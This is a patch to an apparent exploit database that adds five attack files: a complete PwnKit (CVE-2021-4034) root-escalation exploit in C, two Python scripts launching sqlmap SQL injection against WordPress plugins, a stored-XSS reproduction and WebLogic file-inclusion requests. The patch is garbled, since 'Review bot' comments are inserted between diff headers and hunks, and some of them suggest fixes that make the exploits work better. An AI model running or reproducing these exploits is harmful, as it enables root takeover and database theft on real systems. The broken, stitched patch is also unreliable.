From d3b7d652cc5fe777023b44eea9608c70cfd15b90 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 28 Jan 2022 05:01:59 +0000
Subject: [PATCH] DB: 2022-01-28

5 changes to exploits/shellcodes

PolicyKit-1 0.105-31 - Privilege Escalation
Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion
WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated)
WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated)
WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)
---
 exploits/linux/local/50689.txt | 70 ++++++++++++++
 exploits/php/webapps/50685.txt | 20 ++++
 exploits/php/webapps/50686.py | 154 ++++++++++++++++++++++++++++++
 exploits/php/webapps/50687.py | 73 ++++++++++++++
 exploits/windows/remote/50688.txt | 26 +++++
 files_exploits.csv | 5 +
 6 files changed, 348 insertions(+)
 create mode 100644 exploits/linux/local/50689.txt
 create mode 100644 exploits/php/webapps/50685.txt
 create mode 100755 exploits/php/webapps/50686.py
 create mode 100755 exploits/php/webapps/50687.py
 create mode 100644 exploits/windows/remote/50688.txt
diff --git a/exploits/linux/local/50689.txt b/exploits/linux/local/50689.txt
new file mode 100644
index 000000000..260e3795a
--- /dev/null
+++ b/exploits/linux/local/50689.txt
@@ -0,0 +1,70 @@
+# Exploit Title: PolicyKit-1 0.105-31 - Privilege Escalation
+# Exploit Author: Lance Biggerstaff
+# Original Author: ryaagard (https://github.com/ryaagard)
+# Date: 27-01-2022
+# Github Repo: https://github.com/ryaagard/CVE-2021-4034
+# References: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
+
+# Description: The exploit consists of three files `Makefile`, `evil-so.c` & `exploit.c`
+
+##### Makefile #####
+
+all:
+ gcc -shared -o evil.so -fPIC evil-so.c
+ gcc exploit.c -o exploit
+
+clean:
+ rm -r ./GCONV_PATH=. && rm -r ./evildir && rm exploit && rm evil.so
+
+#################
+
+##### evil-so.c #####
+
+#include
+#include
+#include
+
+void gconv() {}
+
+void gconv_init() {
+ setuid(0);
+ setgid(0);
+ setgroups(0);
+
+ execve("/bin/sh", NULL, NULL);
+}
+
+#################
+
+##### exploit.c #####
+
+#include
+#include
+
+#define BIN "/usr/bin/pkexec"
+#define DIR "evildir"
+#define EVILSO "evil"
+
+int main()
+{
+ char *envp[] = {
+ DIR,
+ "PATH=GCONV_PATH=.",
+ "SHELL=ryaagard",
+ "CHARSET=ryaagard",
+ NULL
+ };
+ char *argv[] = { NULL };
+
+ system("mkdir GCONV_PATH=.");
+ system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR);
+ system("mkdir " DIR);
+ system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules");
+ system("cp " EVILSO ".so " DIR);
+
+ execve(BIN, argv, envp);
+
+ return 0;
+}
+
+#################
\ No newline at end of file
diff --git a/exploits/php/webapps/50685.txt b/exploits/php/webapps/50685.txt
new file mode 100644
index 000000000..a5d1b19ef
--- /dev/null
+++ b/exploits/php/webapps/50685.txt
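Review bot: `setgroups(0)` in `gconv_init` has the wrong arity — the libc prototype is `setgroups(size_t size, const gid_t *list)`, so the call should be `setgroups(0, NULL)`; as listed it only compiles because the `#include` lines have lost their header names (they read as bare `#include`, presumably a stripped `<...>`), so gcc falls back to an implicit declaration that recent gcc versions treat as an error. `execve("/bin/sh", NULL, NULL)` passes a NULL argv, which the kernel tolerates but which leaves the shell with no `argv[0]`; `char *argv[] = { "sh", NULL };` is the conventional form. The `system()` calls ignore their return values and the exploit leaves `GCONV_PATH=.` and `evildir` behind on the host unless `make clean` is run, so a note in the description that these artefacts — together with the `SHELL=ryaagard`/`CHARSET=ryaagard` environment values — are what a defender should hunt for after a pwnkit attempt would help readers on both sides.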
@@ -0,0 +1,20 @@
+# Exploit Title: WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 25-10-2021
+# Exploit Author: Ceylan Bozogullarindan
+# Vendor Homepage: https://lenderd.com/
+# Software Link: https://mortgagecalculatorsplugin.com/
+# Version: 1.52
+# Tested on: Linux
+# CVE : CVE-2021-24904 (https://wpscan.com/vulnerability/7b80f89b-e724-41c5-aa03-21d1eef50f21)
+
+
+# Description:
+The plugin gives users real-time estimates by providing mortgage calculators. It does not implement any sanitisation on the color value of the background of a calculator in admin panel, which could lead to authenticated Stored Cross-Site Scripting issues. An attacker can execute malicious javascript codes for all visitors of a page containing the calculator.
+
+
+# Steps To Reproduce:
+1. Go to settings page available under the "Calculator" menu item.
+2. Click the "Select Color" button and type the following payload the input space: `hacked`
+3. Click the "Save Changes" button to save settings.
+4. Create a new page and add the shortcode ([mcwp type="cv"]) of the calculator, for testing.
+5. Visit the page to trigger XSS.
\ No newline at end of file
diff --git a/exploits/php/webapps/50686.py b/exploits/php/webapps/50686.py
new file mode 100755
index 000000000..4f46e5d3c
--- /dev/null
+++ b/exploits/php/webapps/50686.py
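Review bot: Step 2's payload is shown as just `hacked`, which is not an XSS payload — the tag-bearing markup appears to have been stripped from the listing, so the reproduction steps as written cannot trigger anything and the actual payload from the referenced wpscan advisory should be restored with its angle brackets intact. The description should also state which role is needed: the steps require access to the plugin's settings page, so this is an administrator-level (or equivalently privileged) stored XSS, which affects how the finding is triaged. For the fix, a colour setting should be validated as a colour on save (WordPress ships `sanitize_hex_color()`) and escaped with `esc_attr()` where it is written into the page, rather than relying on either alone.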
@@ -0,0 +1,154 @@ +# Exploit Title: WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated) +# Date 23.01.2022 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://registrationmagic.com/ +# Software Link: https://downloads.wordpress.org/plugin/custom-registration-form-builder-with-submission-manager.5.0.1.5.zip +# Version: <= 5.0.1.5 +# Tested on: Ubuntu 20.04 +# CVE: CVE-2021-24862 +# CWE: CWE-89 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24862/README.md + +''' +Description: +The RegistrationMagic WordPress plugin before 5.0.1.6 does not escape user input in its rm_chronos_ajax AJAX action +before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue. +''' + +# Banner: +import os + +banner = ''' + + _____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___ +| | | | __|___|_ | |_ |_ | ___|_ | | | . | _|_ | +| --| | | __|___| _| | | _|_| |_|___| _|_ | . | . | _| +|_____|\___/|_____| |___|___|___|_____| |___| |_|___|___|___| + + [+] RegistrationMagic SQL Injection + [@] Developed by Ron Jost (Hacker5preme) +''' +print(banner) +import string +import argparse +import requests +from datetime import datetime +import random +import json +import subprocess + +# User-Input: +my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +my_parser.add_argument('-u', '--USERNAME', type=str) +my_parser.add_argument('-p', '--PASSWORD', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +wp_path = args.PATH +username = args.USERNAME +password = args.PASSWORD + + +print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) + +# Authentication: +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + 
target_port + wp_path + 'wp-login.php' +check = session.get(auth_url) +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Body: +body = { + 'log': username, + 'pwd': password, + 'wp-submit': 'Log In', + 'testcookie': '1' +} +auth = session.post(auth_url, headers=header, data=body) + +# Create task to ensure duplicate: +dupl_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2' + +# Header: +header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Referer": "http://" + target_ip + ':' + target_port + "/wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2", + "Content-Type": "application/x-www-form-urlencoded", + "Origin": "http://" + target_ip, + "Connection": "close", + "Upgrade-Insecure-Requests": "1", + "Sec-Fetch-Dest": "document", + "Sec-Fetch-Mode": "navigate", + "Sec-Fetch-Site": "same-origin", + "Sec-Fetch-User": "?1" +} + +# Body +body = { + "rmc-task-edit-form-subbed": "yes", + "rm-task-slide": "on", + "rmc_task_name": "Exploitdevelopmenthack" + ''.join(random.choice(string.ascii_letters) for x in range(12)), + "rmc_task_description": "fiasfdhb", + "rmc_rule_sub_time_older_than_age": '', + "rmc_rule_sub_time_younger_than_age": '', + "rmc_rule_fv_fids[]": '', + "rmc_rule_fv_fvals[]": '', + "rmc_rule_pay_status[]": "pending", + 
"rmc_rule_pay_status[]": "canceled", + "rmc_action_user_acc": "do_nothing", + "rmc_action_send_mail_sub": '', + "rmc_action_send_mail_body": '' +} + +# Create project +a = session.post(dupl_url, headers=header, data=body) + + +# SQL-Injection (Exploit): +exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php' + +# Generate payload for sqlmap +print ('[+] Payload for sqlmap exploitation:') +cookies_session = session.cookies.get_dict() +cookie = json.dumps(cookies_session) +cookie = cookie.replace('"}','') +cookie = cookie.replace('{"', '') +cookie = cookie.replace('"', '') +cookie = cookie.replace(" ", '') +cookie = cookie.replace(":", '=') +cookie = cookie.replace(',', '; ') +exploitcode_url = "sqlmap -u http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php' +exploitcode_risk = ' --level 2 --risk 2 --data="action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids%5B%5D=2"' +exploitcode_cookie = ' --cookie="' + cookie + '"' +print(' Sqlmap options:') +print(' -a, --all Retrieve everything') +print(' -b, --banner Retrieve DBMS banner') +print(' --current-user Retrieve DBMS current user') +print(' --current-db Retrieve DBMS current database') +print(' --passwords Enumerate DBMS users password hashes') +print(' --tables Enumerate DBMS database tables') +print(' --columns Enumerate DBMS database table column') +print(' --schema Enumerate DBMS schema') +print(' --dump Dump DBMS database table entries') +print(' --dump-all Dump all DBMS databases tables entries') +retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') +exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + ' ' + retrieve_mode + ' -p task_ids[] -v 0' +os.system(exploitcode) +print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S'))) \ No newline at end of file 
diff --git a/exploits/php/webapps/50687.py b/exploits/php/webapps/50687.py
new file mode 100755
index 000000000..78c113669
--- /dev/null
+++ b/exploits/php/webapps/50687.py
@@ -0,0 +1,73 @@ +# Exploit Title: WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated) +# Date 26.01.2022 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://webnus.net/modern-events-calendar/ +# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.6.1.0.zip +# Version: <= 6.1 +# Tested on: Ubuntu 20.04 +# CVE: CVE-2021-24946 +# CWE: CWE-89 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md + +''' +Description: +The Modern Events Calendar Lite WordPress plugin before 6.1.5 does not sanitise and escape the time parameter +before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users, +leading to an unauthenticated SQL injection issue +''' + +#Banner: +banner = ''' + + .oOOOo. o 'O o.OOoOoo +.O o O o O .oOOo. .oOOo. .oOOo. oO .oOOo. o O .oOOo. o O .oOOo. +o o O o O O o O O O O o O o O o O +o o o ooOO o o O o o o o o o O o o o +o O O' O ooooooooo O' o o O' O ooooooooo O' OooOOo `OooOo OooOOo OoOOo. 
+O `o o o O O O O o O O O O O O +`o .o `o O O .O o O .O O .O o o o O o + `OoooO' `o' ooOooOoO oOoOoO `OooO' oOoOoO OooOO oOoOoO O `OooO' O `OooO' + + [+] Modern Events Calendar Lite SQL-Injection + [@] Developed by Ron Jost (Hacker5preme) + +''' + +print(banner) + +import requests +import argparse +from datetime import datetime +import os + +# User-Input: +my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +wp_path = args.PATH + + +# Exploit: +print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) +print('[*] Payload for SQL-Injection:') +exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" ' +exploitcode_risk = ' -p time' +print(' Sqlmap options:') +print(' -a, --all Retrieve everything') +print(' -b, --banner Retrieve DBMS banner') +print(' --current-user Retrieve DBMS current user') +print(' --current-db Retrieve DBMS current database') +print(' --passwords Enumerate DBMS users password hashes') +print(' --tables Enumerate DBMS database tables') +print(' --columns Enumerate DBMS database table column') +print(' --schema Enumerate DBMS schema') +print(' --dump Dump DBMS database table entries') +print(' --dump-all Dump all DBMS databases tables entries') +retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') +exploitcode = exploitcode_url + retrieve_mode + exploitcode_risk +os.system(exploitcode) +print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S'))) \ No newline at end of file 
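Review bot: `os.system(exploitcode)` runs a shell string assembled from the `-T`/`-P`/`-U` arguments and the interactive `retrieve_mode`, and none of the three arguments is marked `required`, so omitting one fails with a `TypeError` from concatenating `None` instead of a usage message. Mark them `required=True` and run sqlmap as an argument list, e.g. `subprocess.run(["sqlmap", "-u", url, *shlex.split(retrieve_mode), "-p", "time"])` with `url` built once from the arguments, so neither the target string nor the option string ever passes through a shell. The hard-coded `http://` also means a TLS-only target cannot be tested without editing the script; a `--ssl` flag or accepting a full base URL would cover it.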
diff --git a/exploits/windows/remote/50688.txt b/exploits/windows/remote/50688.txt
new file mode 100644
index 000000000..3499bd98a
--- /dev/null
+++ b/exploits/windows/remote/50688.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion
+# Date: 25/1/2022
+# Exploit Author: Jonah Tan (@picar0jsu)
+# Vendor Homepage: https://www.oracle.com
+# Software Link:
+https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
+# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
+# Tested on: Windows Server 2019
+# CVE : CVE-2022-21371
+
+# Description
+Vulnerability in the Oracle WebLogic Server product of Oracle Fusion
+Middleware (component: Web Container).
+Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
+and 14.1.1.0.0.
+Easily exploitable vulnerability allows unauthenticated attacker with
+network access via HTTP to compromise Oracle WebLogic Server.
+Successful attacks of this vulnerability can result in unauthorized access
+to critical data or complete access to all Oracle WebLogic Server
+accessible data.
+
+# PoC
+GET .//META-INF/MANIFEST.MF
+GET .//WEB-INF/web.xml
+GET .//WEB-INF/portlet.xml
+GET .//WEB-INF/weblogic.xml
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3ab4ef029..e389c6df1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
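Review bot: The PoC section lists bare request lines such as `GET .//WEB-INF/web.xml` without saying which deployed application's context root they are sent against, what port, or what a successful response looks like, so a reader cannot reproduce or verify the finding; each entry should be a complete request (`GET /<context>/.//WEB-INF/web.xml HTTP/1.1` plus a `Host:` header) followed by a one-line description of the expected deployment-descriptor content in the response. From the listing the distinguishing token appears to be the `.//` segment in front of `WEB-INF` or `META-INF`, which presumably defeats the container's normal refusal to serve those directories; that token should not occur in legitimate traffic and is cheap to alert on. The header should also point readers at the vendor patch for CVE-2022-21371 as the fix, with a reverse-proxy rule rejecting request paths containing `/./` or `WEB-INF`/`META-INF` as the stopgap until it is applied.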
@@ -11433,6 +11433,7 @@ id,file,description,date,author,type,platform,port
 50653,exploits/windows/local/50653.txt,"Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass",1970-01-01,hyp3rlinx,local,windows,
 50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",1970-01-01,hyp3rlinx,local,windows,
 50664,exploits/windows/local/50664.txt,"WorkTime 10.20 Build 4967 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows,
+50689,exploits/linux/local/50689.txt,"PolicyKit-1 0.105-31 - Privilege Escalation",1970-01-01,"Lance Biggerstaff",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18599,6 +18600,7 @@ id,file,description,date,author,type,platform,port
 50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Jeremiasz Pluta",remote,python,
 50652,exploits/windows/remote/50652.txt,"CoreFTP Server build 725 - Directory Traversal (Authenticated)",1970-01-01,LiamInfosec,remote,windows,
 50665,exploits/windows/remote/50665.txt,"Archeevo 5.0 - Local File Inclusion",1970-01-01,"Miguel Santareno",remote,windows,
+50688,exploits/windows/remote/50688.txt,"Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion",1970-01-01,"Jonah Tan",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44762,3 +44764,6 @@ id,file,description,date,author,type,platform,port
 50682,exploits/php/webapps/50682.txt,"Online Project Time Management System 1.0 - SQLi (Authenticated)",1970-01-01,"Felipe Alcantara",webapps,php,
 50683,exploits/php/webapps/50683.txt,"Online Project Time Management System 1.0 - Multiple Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Felipe Alcantara",webapps,php,
 50684,exploits/php/webapps/50684.py,"PHPIPAM 1.4.4 - SQLi (Authenticated)",1970-01-01,"Rodolfo Tavares",webapps,php,
+50685,exploits/php/webapps/50685.txt,"WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
+50686,exploits/php/webapps/50686.py,"WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
+50687,exploits/php/webapps/50687.py,"WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php,